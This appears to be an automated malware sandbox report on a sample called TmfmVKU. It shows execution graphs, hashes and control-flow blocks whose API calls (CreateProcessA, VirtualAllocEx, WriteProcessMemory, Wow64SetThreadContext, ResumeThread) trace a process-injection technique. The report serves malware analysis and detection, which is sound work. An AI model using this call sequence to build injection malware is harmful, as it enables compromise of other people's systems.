                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: 083be5d20a38de15766f3ef860357b1cc55748752fed3ea45752f33e629de2a6
                        • Instruction ID: 2cd275da54e93b5a195d3bf3cd3aa1e2383bf30ff28f3b086a210f15c2b40468
                        • Opcode Fuzzy Hash: 083be5d20a38de15766f3ef860357b1cc55748752fed3ea45752f33e629de2a6
                        • Instruction Fuzzy Hash: 81B1E030B006498FDB58CB69C854ABEBBF6BF88300B14946AE506DB7A1DB35DC05CB91

                        Execution Graph

                        Execution Coverage:10.8%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:235
                        Total number of Limit Nodes:12
                        execution_graph 22097 31a5348 22098 31a54d3 22097->22098 22100 31a536e 22097->22100 22100->22098 22101 31a393c 22100->22101 22102 31a55c8 PostMessageW 22101->22102 22103 31a5634 22102->22103 22103->22100 21806 1a6d040 21807 1a6d045 GetCurrentProcess 21806->21807 21809 1a6d0d8 GetCurrentThread 21807->21809 21811 1a6d0d1 21807->21811 21810 1a6d115 GetCurrentProcess 21809->21810 21812 1a6d10e 21809->21812 21813 1a6d14b 21810->21813 21811->21809 21812->21810 21814 1a6d173 GetCurrentThreadId 21813->21814 21815 1a6d1a4 21814->21815 22104 1a6d690 22105 1a6d695 DuplicateHandle 22104->22105 22106 1a6d726 22105->22106 21816 31a1df3 21817 31a1dfd 21816->21817 21818 31a2025 21816->21818 21822 31a41a8 21817->21822 21838 31a4206 21817->21838 21855 31a4199 21817->21855 21823 31a41c2 21822->21823 21832 31a41e6 21823->21832 21871 31a47be 21823->21871 21878 31a46e5 21823->21878 21883 31a4981 21823->21883 21888 31a4f60 21823->21888 21892 31a4762 21823->21892 21897 31a4c02 21823->21897 21902 31a49ec 21823->21902 21907 31a45ea 21823->21907 21912 31a4df0 21823->21912 21917 31a49b0 21823->21917 21921 31a485d 21823->21921 21926 31a48df 21823->21926 21934 31a495e 21823->21934 21832->21818 21840 31a4194 21838->21840 21841 31a4209 21838->21841 21839 31a415f 21839->21818 21840->21839 21842 31a47be 4 API calls 21840->21842 21843 31a495e 2 API calls 21840->21843 21844 31a48df 2 API calls 21840->21844 21845 31a485d 2 API calls 21840->21845 21846 31a49b0 2 API calls 21840->21846 21847 31a4df0 2 API calls 21840->21847 21848 31a45ea 2 API calls 21840->21848 21849 31a49ec 2 API calls 21840->21849 21850 31a4c02 2 API calls 21840->21850 21851 31a4762 2 API calls 21840->21851 21852 31a4f60 2 API calls 21840->21852 21853 31a4981 2 API calls 21840->21853 21854 31a46e5 2 API calls 21840->21854 21841->21818 21842->21839 21843->21839 21844->21839 21845->21839 21846->21839 21847->21839 21848->21839 21849->21839 21850->21839 21851->21839 21852->21839 21853->21839 21854->21839 21856 31a41c2 21855->21856 21857 31a47be 4 API calls 21856->21857 21858 31a495e 2 API calls 21856->21858 21859 31a48df 2 API calls 21856->21859 21860 31a485d 2 API calls 21856->21860 21861 31a49b0 2 API calls 21856->21861 21862 31a4df0 2 API calls 21856->21862 21863 31a45ea 2 API calls 21856->21863 21864 31a49ec 2 API calls 21856->21864 21865 31a41e6 21856->21865 21866 31a4c02 2 API calls 21856->21866 21867 31a4762 2 API calls 21856->21867 21868 31a4f60 2 API calls 21856->21868 21869 31a4981 2 API calls 21856->21869 21870 31a46e5 2 API calls 21856->21870 21857->21865 21858->21865 21859->21865 21860->21865 21861->21865 21862->21865 21863->21865 21864->21865 21865->21818 21866->21865 21867->21865 21868->21865 21869->21865 21870->21865 21942 31a17a8 21871->21942 21946 31a17b0 21871->21946 21872 31a4c89 21872->21832 21873 31a46f1 21873->21872 21950 31a16b8 21873->21950 21954 31a16c0 21873->21954 21879 31a46f1 21878->21879 21880 31a4cc7 21879->21880 21881 31a16b8 WriteProcessMemory 21879->21881 21882 31a16c0 WriteProcessMemory 21879->21882 21880->21832 21881->21879 21882->21879 21884 31a4987 21883->21884 21958 31a15f9 21884->21958 21962 31a1600 21884->21962 21885 31a501c 21890 31a16b8 WriteProcessMemory 21888->21890 21891 31a16c0 WriteProcessMemory 21888->21891 21889 31a4f84 21890->21889 21891->21889 21893 31a46f1 21892->21893 21893->21892 21894 31a4cc7 21893->21894 21895 31a16b8 WriteProcessMemory 21893->21895 21896 31a16c0 WriteProcessMemory 21893->21896 21894->21832 21895->21893 21896->21893 21898 31a4ffe 21897->21898 21900 31a15f9 VirtualAllocEx 21898->21900 21901 31a1600 VirtualAllocEx 21898->21901 21899 31a501c 21900->21899 21901->21899 21903 31a49a9 21902->21903 21905 31a15f9 VirtualAllocEx 21903->21905 21906 31a1600 VirtualAllocEx 21903->21906 21904 31a501c 21905->21904 21906->21904 21908 31a45f0 21907->21908 21966 31a1948 21908->21966 21970 31a193c 21908->21970 21913 31a4e99 21912->21913 21974 31a10eb 21913->21974 21978 31a10f0 21913->21978 21914 31a4eb4 21919 31a10eb Wow64SetThreadContext 21917->21919 21920 31a10f0 Wow64SetThreadContext 21917->21920 21918 31a49ca 21919->21918 21920->21918 21922 31a4866 21921->21922 21982 31a1038 21922->21982 21986 31a1040 21922->21986 21923 31a48c0 21927 31a48e5 21926->21927 21930 31a16b8 WriteProcessMemory 21927->21930 21931 31a16c0 WriteProcessMemory 21927->21931 21928 31a4abf 21928->21832 21929 31a46f1 21929->21928 21932 31a16b8 WriteProcessMemory 21929->21932 21933 31a16c0 WriteProcessMemory 21929->21933 21930->21929 21931->21929 21932->21929 21933->21929 21935 31a48f6 21934->21935 21937 31a46f1 21934->21937 21938 31a16b8 WriteProcessMemory 21935->21938 21939 31a16c0 WriteProcessMemory 21935->21939 21936 31a4abf 21936->21832 21937->21936 21940 31a16b8 WriteProcessMemory 21937->21940 21941 31a16c0 WriteProcessMemory 21937->21941 21938->21937 21939->21937 21940->21937 21941->21937 21943 31a17fb ReadProcessMemory 21942->21943 21945 31a183f 21943->21945 21945->21873 21947 31a17fb ReadProcessMemory 21946->21947 21949 31a183f 21947->21949 21949->21873 21951 31a1708 WriteProcessMemory 21950->21951 21953 31a175f 21951->21953 21953->21873 21955 31a1708 WriteProcessMemory 21954->21955 21957 31a175f 21955->21957 21957->21873 21959 31a1640 VirtualAllocEx 21958->21959 21961 31a167d 21959->21961 21961->21885 21963 31a1640 VirtualAllocEx 21962->21963 21965 31a167d 21963->21965 21965->21885 21967 31a19d1 21966->21967 21967->21967 21968 31a1b36 CreateProcessA 21967->21968 21969 31a1b93 21968->21969 21971 31a19d1 21970->21971 21971->21971 21972 31a1b36 CreateProcessA 21971->21972 21973 31a1b93 21972->21973 21975 31a1135 Wow64SetThreadContext 21974->21975 21977 31a117d 21975->21977 21977->21914 21979 31a1135 Wow64SetThreadContext 21978->21979 21981 31a117d 21979->21981 21981->21914 21983 31a1080 ResumeThread 21982->21983 21985 31a10b1 21983->21985 21985->21923 21987 31a1080 ResumeThread 21986->21987 21989 31a10b1 21987->21989 21989->21923 21990 1a64668 21991 1a6467a 21990->21991 21992 1a64686 21991->21992 21996 1a64779 21991->21996 22001 1a63e40 21992->22001 21994 1a646a5 21997 1a6479d 21996->21997 22005 1a64879 21997->22005 22009 1a64888 21997->22009 22002 1a63e4b 22001->22002 22017 1a65c4c 22002->22017 22004 1a67048 22004->21994 22006 1a64888 22005->22006 22007 1a6498c 22006->22007 22013 1a644c4 22006->22013 22010 1a648af 22009->22010 22011 1a6498c 22010->22011 22012 1a644c4 CreateActCtxA 22010->22012 22012->22011 22014 1a65918 CreateActCtxA 22013->22014 22016 1a659db 22014->22016 22018 1a65c57 22017->22018 22021 1a65c6c 22018->22021 22020 1a670ed 22020->22004 22022 1a65c77 22021->22022 22025 1a65c9c 22022->22025 22024 1a671c2 22024->22020 22026 1a65ca7 22025->22026 22029 1a65ccc 22026->22029 22028 1a672c5 22028->22024 22030 1a65cd7 22029->22030 22032 1a685cb 22030->22032 22036 1a6ac79 22030->22036 22031 1a68609 22031->22028 22032->22031 22040 1a6cd77 22032->22040 22044 1a6cd68 22032->22044 22048 1a6aca0 22036->22048 22053 1a6acb0 22036->22053 22037 1a6ac8e 22037->22032 22041 1a6cd99 22040->22041 22042 1a6cdbd 22041->22042 22085 1a6cf28 22041->22085 22042->22031 22046 1a6cd98 22044->22046 22045 1a6cdbd 22045->22031 22046->22045 22047 1a6cf28 3 API calls 22046->22047 22047->22045 22049 1a6acb0 22048->22049 22057 1a6ad97 22049->22057 22065 1a6ada8 22049->22065 22050 1a6acbf 22050->22037 22055 1a6ad97 2 API calls 22053->22055 22056 1a6ada8 2 API calls 22053->22056 22054 1a6acbf 22054->22037 22055->22054 22056->22054 22058 1a6adb9 22057->22058 22059 1a6addc 22057->22059 22058->22059 22073 1a6b031 22058->22073 22077 1a6b040 22058->22077 22059->22050 22060 1a6add4 22060->22059 22061 1a6afe0 GetModuleHandleW 22060->22061 22062 1a6b00d 22061->22062 22062->22050 22066 1a6adb9 22065->22066 22067 1a6addc 22065->22067 22066->22067 22071 1a6b040 LoadLibraryExW 22066->22071 22072 1a6b031 LoadLibraryExW 22066->22072 22067->22050 22068 1a6add4 22068->22067 22069 1a6afe0 GetModuleHandleW 22068->22069 22070 1a6b00d 22069->22070 22070->22050 22071->22068 22072->22068 22074 1a6b040 22073->22074 22076 1a6b079 22074->22076 22081 1a6a130 22074->22081 22076->22060 22078 1a6b054 22077->22078 22079 1a6a130 LoadLibraryExW 22078->22079 22080 1a6b079 22078->22080 22079->22080 22080->22060 22082 1a6b220 LoadLibraryExW 22081->22082 22084 1a6b299 22082->22084 22084->22076 22087 1a6cf35 22085->22087 22088 1a6cf6f 22087->22088 22089 1a6bae0 22087->22089 22088->22042 22090 1a6baeb 22089->22090 22092 1a6dc88 22090->22092 22093 1a6d2dc 22090->22093 22092->22092 22094 1a6d2e7 22093->22094 22095 1a65ccc 3 API calls 22094->22095 22096 1a6dcf7 22095->22096 22096->22092

                        Executed Functions

                        Function 01A6D031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 294 1a6d031-1a6d03e 295 1a6d045-1a6d0cf GetCurrentProcess 294->295 296 1a6d040-1a6d044 294->296 300 1a6d0d1-1a6d0d7 295->300 301 1a6d0d8-1a6d10c GetCurrentThread 295->301 296->295 300->301 302 1a6d115-1a6d149 GetCurrentProcess 301->302 303 1a6d10e-1a6d114 301->303 304 1a6d152-1a6d16d call 1a6d618 302->304 305 1a6d14b-1a6d151 302->305 303->302 309 1a6d173-1a6d1a2 GetCurrentThreadId 304->309 305->304 310 1a6d1a4-1a6d1aa 309->310 311 1a6d1ab-1a6d20d 309->311 310->311
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 01A6D0BE
                        • GetCurrentThread.KERNEL32 ref: 01A6D0FB
                        • GetCurrentProcess.KERNEL32 ref: 01A6D138
                        • GetCurrentThreadId.KERNEL32 ref: 01A6D191
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 8131e8ad68cacede002a774363203abbd31a528fe1413bfba0ce82b2198b5d45
                        • Instruction ID: 4c181c7af1db2f8709238fdb18e456960b553d86fa7f203721a3dd94ea2c250f
                        • Opcode Fuzzy Hash: 8131e8ad68cacede002a774363203abbd31a528fe1413bfba0ce82b2198b5d45
                        • Instruction Fuzzy Hash: 785155B0A00349CFDB18DFA9D548B9EBFF6FF88314F208459E009A7290DB745985CB65
                        Function 01A6D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 318 1a6d040-1a6d0cf GetCurrentProcess 323 1a6d0d1-1a6d0d7 318->323 324 1a6d0d8-1a6d10c GetCurrentThread 318->324 323->324 325 1a6d115-1a6d149 GetCurrentProcess 324->325 326 1a6d10e-1a6d114 324->326 327 1a6d152-1a6d16d call 1a6d618 325->327 328 1a6d14b-1a6d151 325->328 326->325 332 1a6d173-1a6d1a2 GetCurrentThreadId 327->332 328->327 333 1a6d1a4-1a6d1aa 332->333 334 1a6d1ab-1a6d20d 332->334 333->334
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 01A6D0BE
                        • GetCurrentThread.KERNEL32 ref: 01A6D0FB
                        • GetCurrentProcess.KERNEL32 ref: 01A6D138
                        • GetCurrentThreadId.KERNEL32 ref: 01A6D191
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: bfe735de8e4f3ac8d4c2c1fb9a05a68486ff55c946f33bedb184e3076501bd91
                        • Instruction ID: 2a0a9e462eb01567b4f7a37addc3b6679fdcc1eaad82ef5b304cdc1608c44bd6
                        • Opcode Fuzzy Hash: bfe735de8e4f3ac8d4c2c1fb9a05a68486ff55c946f33bedb184e3076501bd91
                        • Instruction Fuzzy Hash: 2A5135B09003098FDB14DFA9D548B9EBFF6FB48314F208459E419A7290DB749984CB65
                        Function 031A193C Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 438 31a193c-31a19dd 440 31a19df-31a19e9 438->440 441 31a1a16-31a1a36 438->441 440->441 442 31a19eb-31a19ed 440->442 448 31a1a38-31a1a42 441->448 449 31a1a6f-31a1a9e 441->449 443 31a19ef-31a19f9 442->443 444 31a1a10-31a1a13 442->444 446 31a19fb 443->446 447 31a19fd-31a1a0c 443->447 444->441 446->447 447->447 450 31a1a0e 447->450 448->449 451 31a1a44-31a1a46 448->451 457 31a1aa0-31a1aaa 449->457 458 31a1ad7-31a1b91 CreateProcessA 449->458 450->444 452 31a1a48-31a1a52 451->452 453 31a1a69-31a1a6c 451->453 455 31a1a56-31a1a65 452->455 456 31a1a54 452->456 453->449 455->455 459 31a1a67 455->459 456->455 457->458 460 31a1aac-31a1aae 457->460 469 31a1b9a-31a1c20 458->469 470 31a1b93-31a1b99 458->470 459->453 462 31a1ab0-31a1aba 460->462 463 31a1ad1-31a1ad4 460->463 464 31a1abe-31a1acd 462->464 465 31a1abc 462->465 463->458 464->464 467 31a1acf 464->467 465->464 467->463 480 31a1c22-31a1c26 469->480 481 31a1c30-31a1c34 469->481 470->469 480->481 482 31a1c28 480->482 483 31a1c36-31a1c3a 481->483 484 31a1c44-31a1c48 481->484 482->481 483->484 487 31a1c3c 483->487 485 31a1c4a-31a1c4e 484->485 486 31a1c58-31a1c5c 484->486 485->486 488 31a1c50 485->488 489 31a1c6e-31a1c75 486->489 490 31a1c5e-31a1c64 486->490 487->484 488->486 491 31a1c8c 489->491 492 31a1c77-31a1c86 489->492 490->489 494 31a1c8d 491->494 492->491 494->494
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 031A1B7E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 4a0c4a87cb58af95939b5d3bc555ab6f4d61f0c979536261a36a26b5a16a60c4
                        • Instruction ID: f212f74e352c70864e3e3dac49c9ed961d480cb15ad0ce87a18765a09b2f32f2
                        • Opcode Fuzzy Hash: 4a0c4a87cb58af95939b5d3bc555ab6f4d61f0c979536261a36a26b5a16a60c4
                        • Instruction Fuzzy Hash: 4EA19A75D0075A9FDB20CF6CC8417EDBBB2BF48311F0485AAD819A7280DB749985CF91
                        Function 031A1948 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 495 31a1948-31a19dd 497 31a19df-31a19e9 495->497 498 31a1a16-31a1a36 495->498 497->498 499 31a19eb-31a19ed 497->499 505 31a1a38-31a1a42 498->505 506 31a1a6f-31a1a9e 498->506 500 31a19ef-31a19f9 499->500 501 31a1a10-31a1a13 499->501 503 31a19fb 500->503 504 31a19fd-31a1a0c 500->504 501->498 503->504 504->504 507 31a1a0e 504->507 505->506 508 31a1a44-31a1a46 505->508 514 31a1aa0-31a1aaa 506->514 515 31a1ad7-31a1b91 CreateProcessA 506->515 507->501 509 31a1a48-31a1a52 508->509 510 31a1a69-31a1a6c 508->510 512 31a1a56-31a1a65 509->512 513 31a1a54 509->513 510->506 512->512 516 31a1a67 512->516 513->512 514->515 517 31a1aac-31a1aae 514->517 526 31a1b9a-31a1c20 515->526 527 31a1b93-31a1b99 515->527 516->510 519 31a1ab0-31a1aba 517->519 520 31a1ad1-31a1ad4 517->520 521 31a1abe-31a1acd 519->521 522 31a1abc 519->522 520->515 521->521 524 31a1acf 521->524 522->521 524->520 537 31a1c22-31a1c26 526->537 538 31a1c30-31a1c34 526->538 527->526 537->538 539 31a1c28 537->539 540 31a1c36-31a1c3a 538->540 541 31a1c44-31a1c48 538->541 539->538 540->541 544 31a1c3c 540->544 542 31a1c4a-31a1c4e 541->542 543 31a1c58-31a1c5c 541->543 542->543 545 31a1c50 542->545 546 31a1c6e-31a1c75 543->546 547 31a1c5e-31a1c64 543->547 544->541 545->543 548 31a1c8c 546->548 549 31a1c77-31a1c86 546->549 547->546 551 31a1c8d 548->551 549->548 551->551
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 031A1B7E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 2480bc107ac5049c353f6c4e4398652ea4611349598d31490e604cd6183f8d85
                        • Instruction ID: c9a455be96298dd9ceae81472e97bcad78b5cdd1d7d2f6e6c132b2ab1d174dec
                        • Opcode Fuzzy Hash: 2480bc107ac5049c353f6c4e4398652ea4611349598d31490e604cd6183f8d85
                        • Instruction Fuzzy Hash: B7918975D0075A9FDB20CF68C841BEDBBB2FF48311F0485AAE819A7280DB749985CF91
                        Function 01A6ADA8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 552 1a6ada8-1a6adb7 553 1a6ade3-1a6ade7 552->553 554 1a6adb9-1a6adc6 call 1a6a0cc 552->554 556 1a6adfb-1a6ae3c 553->556 557 1a6ade9-1a6adf3 553->557 559 1a6addc 554->559 560 1a6adc8 554->560 563 1a6ae3e-1a6ae46 556->563 564 1a6ae49-1a6ae57 556->564 557->556 559->553 607 1a6adce call 1a6b040 560->607 608 1a6adce call 1a6b031 560->608 563->564 565 1a6ae7b-1a6ae7d 564->565 566 1a6ae59-1a6ae5e 564->566 571 1a6ae80-1a6ae87 565->571 568 1a6ae60-1a6ae67 call 1a6a0d8 566->568 569 1a6ae69 566->569 567 1a6add4-1a6add6 567->559 570 1a6af18-1a6afd8 567->570 573 1a6ae6b-1a6ae79 568->573 569->573 602 1a6afe0-1a6b00b GetModuleHandleW 570->602 603 1a6afda-1a6afdd 570->603 574 1a6ae94-1a6ae9b 571->574 575 1a6ae89-1a6ae91 571->575 573->571 577 1a6ae9d-1a6aea5 574->577 578 1a6aea8-1a6aeaa call 1a6a0e8 574->578 575->574 577->578 582 1a6aeaf-1a6aeb1 578->582 583 1a6aeb3-1a6aebb 582->583 584 1a6aebe-1a6aec3 582->584 583->584 585 1a6aec5-1a6aecc 584->585 586 1a6aee1-1a6aeee 584->586 585->586 588 1a6aece-1a6aede call 1a6a0f8 call 1a6a108 585->588 593 1a6aef0-1a6af0e 586->593 594 1a6af11-1a6af17 586->594 588->586 593->594 604 1a6b014-1a6b028 602->604 605 1a6b00d-1a6b013 602->605 603->602 605->604 607->567 608->567
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01A6AFFE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 41185ea425b72ce606a8e4dd310c9617a3d1effeb862f865b70c8d1f1d3cb019
                        • Instruction ID: 1b4dc2470cb06519efdce5d61975a913d21ae127d89f120703153ff641752e79
                        • Opcode Fuzzy Hash: 41185ea425b72ce606a8e4dd310c9617a3d1effeb862f865b70c8d1f1d3cb019
                        • Instruction Fuzzy Hash: 197165B0A00B158FD724DF29D54479ABBF6FF88314F008A2DD49AE7A50DB34E949CB90
                        Function 01A6590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 609 1a6590c-1a65916 610 1a65918-1a659d9 CreateActCtxA 609->610 612 1a659e2-1a65a3c 610->612 613 1a659db-1a659e1 610->613 620 1a65a3e-1a65a41 612->620 621 1a65a4b-1a65a4f 612->621 613->612 620->621 622 1a65a60 621->622 623 1a65a51-1a65a5d 621->623 625 1a65a61 622->625 623->622 625->625
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 01A659C9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 61b9ee2cbf0aa7feb3ef005c65e135b3b864f385974497e3511a7d0dceaf103e
                        • Instruction ID: aff96234f5f81e034d4248336c1152c2ccd9402e6c0be846958a7cb3bd907a2a
                        • Opcode Fuzzy Hash: 61b9ee2cbf0aa7feb3ef005c65e135b3b864f385974497e3511a7d0dceaf103e
                        • Instruction Fuzzy Hash: 5541E2B1C00719CFDB24DFA9C884ADDBBF5BF49314F20805AD409AB255DB756946CF90
                        Function 01A644C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 626 1a644c4-1a659d9 CreateActCtxA 629 1a659e2-1a65a3c 626->629 630 1a659db-1a659e1 626->630 637 1a65a3e-1a65a41 629->637 638 1a65a4b-1a65a4f 629->638 630->629 637->638 639 1a65a60 638->639 640 1a65a51-1a65a5d 638->640 642 1a65a61 639->642 640->639 642->642
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 01A659C9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 87aa19308da70e9965c0a5bfb726c89e3b6ff46b58a9231ce15374b8ba009375
                        • Instruction ID: 102be4c4efbe1cfd88c917fec119e2c1a81ebb0423d654f99f284ede89805a70
                        • Opcode Fuzzy Hash: 87aa19308da70e9965c0a5bfb726c89e3b6ff46b58a9231ce15374b8ba009375
                        • Instruction Fuzzy Hash: 5041CFB0C0071ECEDB24DFA9C884A9DBBF5BF49304F24806AD409AB255DB756945CF90
                        Function 031A16B8 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 643 31a16b8-31a170e 645 31a171e-31a175d WriteProcessMemory 643->645 646 31a1710-31a171c 643->646 648 31a175f-31a1765 645->648 649 31a1766-31a1796 645->649 646->645 648->649
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 031A1750
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: f312e3bcdbe6cbf93472e99ce50ec20f39e67d5d8bf68647a32747eb2bdd19b1
                        • Instruction ID: dac58bb0785a0602d0700608f8cefd121abea4280651e80bc6976c838e151394
                        • Opcode Fuzzy Hash: f312e3bcdbe6cbf93472e99ce50ec20f39e67d5d8bf68647a32747eb2bdd19b1
                        • Instruction Fuzzy Hash: DA2146B59003499FCB10DFA9C985BDEBBF1FF48311F14842AE959A7240C7789944CBA0
                        Function 031A16C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 653 31a16c0-31a170e 655 31a171e-31a175d WriteProcessMemory 653->655 656 31a1710-31a171c 653->656 658 31a175f-31a1765 655->658 659 31a1766-31a1796 655->659 656->655 658->659
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 031A1750
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: f5e1c6b0238550636735486789f6199d0143861cf4d1332189f616873cf48761
                        • Instruction ID: 27e01eb3033fb68a4d9a2c91f0eccf3b58820109e80abd5310b6f3e07af35e05
                        • Opcode Fuzzy Hash: f5e1c6b0238550636735486789f6199d0143861cf4d1332189f616873cf48761
                        • Instruction Fuzzy Hash: 49214AB59003499FCB10DFA9C885BDEFBF5FF48310F148429E919A7240C7789954CBA4
                        Function 031A17A8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 663 31a17a8-31a183d ReadProcessMemory 666 31a183f-31a1845 663->666 667 31a1846-31a1876 663->667 666->667
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 031A1830
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1856075296.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_31a0000_TmfmVKU.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: da254246c28990af80a48a27c43fefbe7f3cdbd9bed30397dde971216e2e7961
                        • Instruction ID: 138431b68bce4a7a6cc9422baecbd98ab489c88ccb50f875b3383f1e85404846
                        • Opcode Fuzzy Hash: da254246c28990af80a48a27c43fefbe7f3cdbd9bed30397dde971216e2e7961
                        • Instruction Fuzzy Hash: C52136B1C002499FCB10DFA9C881AEEBBF1FF48310F54842AE959A7240C738A941CBA1
                        Function 01A6D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 671 1a6d689-1a6d68e 672 1a6d695-1a6d724 DuplicateHandle 671->672 673 1a6d690-1a6d694 671->673 674 1a6d726-1a6d72c 672->674 675 1a6d72d-1a6d74a 672->675 673->672 674->675
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A6D717
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1855723967.0000000001A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1a60000_TmfmVKU.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: aaeb12b0b611544b7b1de09f8942ada7db54ea45efbff78781ee7ad30780d49a
                        • Instruction ID: e6421be47fde61342f4c348abe1b8d863742021938ce58c9215763785ffc3814
                        • Opcode Fuzzy Hash: aaeb12b0b611544b7b1de09f8942ada7db54ea45efbff78781ee7ad30780d49a
                        • Instruction Fuzzy Hash: 0A2103B59002499FDB10CF9AD984ADEBFF8EB48314F14801AE958A7210D378A950CFA5
                        Function 031A10F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 031A116E
                        Memory Dump Source
